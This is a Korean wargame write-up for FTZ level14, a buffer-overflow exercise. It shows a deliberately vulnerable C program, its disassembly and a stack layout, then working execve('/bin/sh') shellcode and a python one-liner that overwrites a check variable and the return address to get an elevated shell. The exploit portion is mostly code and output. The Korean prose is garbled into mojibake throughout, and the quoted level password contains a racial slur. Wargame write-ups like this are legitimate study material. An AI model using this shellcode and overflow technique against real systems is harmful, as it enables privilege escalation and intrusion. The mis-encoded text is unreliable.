Kang MyoungSeok

Kang MyoungSeok

Blog for Studying
Computer Science Engineering
and Cyber Security

[FTZ] level14 ํ’€์ด

1 ๋ถ„ ์†Œ์š”

๐Ÿ’ก FTZ level14 ํ’€์ด

๋ฌธ์ œ

๊ณ„์ • : level14/what that nigga want?

hint

๋ ˆ๋ฒจ14 ์ดํ›„๋กœ๋Š” mainsource์˜ ๋ฌธ์ œ๋ฅผ ๊ทธ๋Œ€๋กœ ๊ฐ€์ ธ์™”์Šต๋‹ˆ๋‹ค.
๋ฒ„ํผ ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ, ํฌ๋งท์ŠคํŠธ๋ง์„ ํ•™์Šตํ•˜๋Š”๋ฐ๋Š” ์ด ๋ฌธ์ œ๋“ค์ด
์ตœ๊ณ ์˜ ํšจ๊ณผ๋ฅผ ๊ฐ€์ ธ๋‹ค์ค๋‹ˆ๋‹ค.

#include <stdio.h>
#include <unistd.h>

main()
{ int crap;
  int check;
  char buf[20];
  fgets(buf,45,stdin);
  if (check==0xdeadbeef)
   {
     setreuid(3095,3095);
     system("/bin/sh");
   }
}

ํ’€์ด

13๋ฒˆ๊ณผ ๋™์ผํ•˜๊ฒŒ, ret ์ฃผ์†Œ๋ฅผ ๋ฎ๋Š” ๊ณผ์ •์—์„œ check ๋ณ€์ˆ˜์™€ crap ๋ณ€์ˆ˜๋„ ๋ฎ์–ด ์“ฐ์—ฌ ์ง‘๋‹ˆ๋‹ค. ์ด๋•Œ, check ๋ณ€์ˆ˜๋ฅผ ๊ฒ€์ฆํ•˜๊ณ  ์žˆ์œผ๋ฏ€๋กœ, check ๋ณ€์ˆ˜ ๊ฐ’์„ ์ฃผ์˜ํ•˜์—ฌ ๋ฎ์–ด์“ฐ๋ฉด ๋ฉ๋‹ˆ๋‹ค.

๋จผ์ € ๋ฉ”๋ชจ๋ฆฌ ๊ตฌ์กฐ๋ฅผ ๋ถ„์„ํ•ฉ๋‹ˆ๋‹ค.

[level14@ftz level14]$ gdb -q attackme
(gdb) set disass intel
(gdb) disass main
Dump of assembler code for function main:
0x08048490 <main+0>:    push   ebp
0x08048491 <main+1>:    mov    ebp,esp
0x08048493 <main+3>:    sub    esp,0x38
0x08048496 <main+6>:    sub    esp,0x4
0x08048499 <main+9>:    push   ds:0x8049664
0x0804849f <main+15>:   push   0x2d
0x080484a1 <main+17>:   lea    eax,[ebp-56]   //ebp-56 ์œ„์น˜์— buf ์กด์žฌ
0x080484a4 <main+20>:   push   eax
0x080484a5 <main+21>:   call   0x8048360 <fgets>
0x080484aa <main+26>:   add    esp,0x10
0x080484ad <main+29>:   cmp    DWORD PTR [ebp-16],0xdeadbeef //ebp-16 ์œ„์น˜์— check ์กด์žฌ
0x080484b4 <main+36>:   jne    0x80484db <main+75>
0x080484b6 <main+38>:   sub    esp,0x8
0x080484b9 <main+41>:   push   0xc17
0x080484be <main+46>:   push   0xc17
0x080484c3 <main+51>:   call   0x8048380 <setreuid>
0x080484c8 <main+56>:   add    esp,0x10
0x080484cb <main+59>:   sub    esp,0xc
0x080484ce <main+62>:   push   0x8048548
0x080484d3 <main+67>:   call   0x8048340 <system>
0x080484d8 <main+72>:   add    esp,0x10
0x080484db <main+75>:   leave
0x080484dc <main+76>:   ret
0x080484dd <main+77>:   lea    esi,[esi]

๋ฉ”๋ชจ๋ฆฌ ๊ตฌ์กฐ๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™์ด ๋˜์–ด ์žˆ์Šต๋‹ˆ๋‹ค.

ret(4)
ebp(4)
dummy + crap (12)
check(4)  // ebp-16
dummy(20) // buf์™€ check ์ฃผ์†Œ ์ฐจ์ด ๋งŒํผ
buf(20)   // ebp-56

ํ™˜๊ฒฝ๋ณ€์ˆ˜์— ์‰˜์ฝ”๋“œ๋ฅผ ๋“ฑ๋กํ•˜๊ณ , ํ™˜๊ฒฝ๋ณ€์ˆ˜์˜ ์ฃผ์†Œ๋ฅผ ์•Œ์•„๋ƒ…๋‹ˆ๋‹ค.

[level14@ftz tmp]$ export SHELLCODE=$(python -c 'print("\x90"*30+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80")')
[level14@ftz tmp]$ echo 'int main(){printf("%p\n",getenv("SHELLCODE"));}' >> env.c
[level14@ftz tmp]$ gcc -o env env.c
[level14@ftz tmp]$ ./env
0xbffffc6d

ํ”„๋กœ๊ทธ๋žจ์„ ์‹คํ–‰ํ•˜์—ฌ ret ์ฃผ์†Œ๋ฅผ ๋ฎ์–ด ์”๋‹ˆ๋‹ค.

  1. buf + dummy 40 ๋ฐ”์ดํŠธ
  2. check -> 0xdeadbeef
  3. dummy + crap + ebp 16 ๋ฐ”์ดํŠธ
  4. 0xbffffc6d ๋กœ ๋ฆฌํ„ด ์ฃผ์†Œ ๋ณ€๊ฒฝ
[level14@ftz level14]$ (python -c'print("A"*40+"\xef\xbe\xad\xde"+"A"*16+"\x6d\xfc\xff\xbf")';cat) | ./attackme

id
uid=3095(level15) gid=3094(level14) groups=3094(level14)

my-pass
Level15 Password is "guess what".

ํƒœ๊ทธ:

์นดํ…Œ๊ณ ๋ฆฌ:

์—…๋ฐ์ดํŠธ:

๋Œ“๊ธ€๋‚จ๊ธฐ๊ธฐ

์ฐธ๊ณ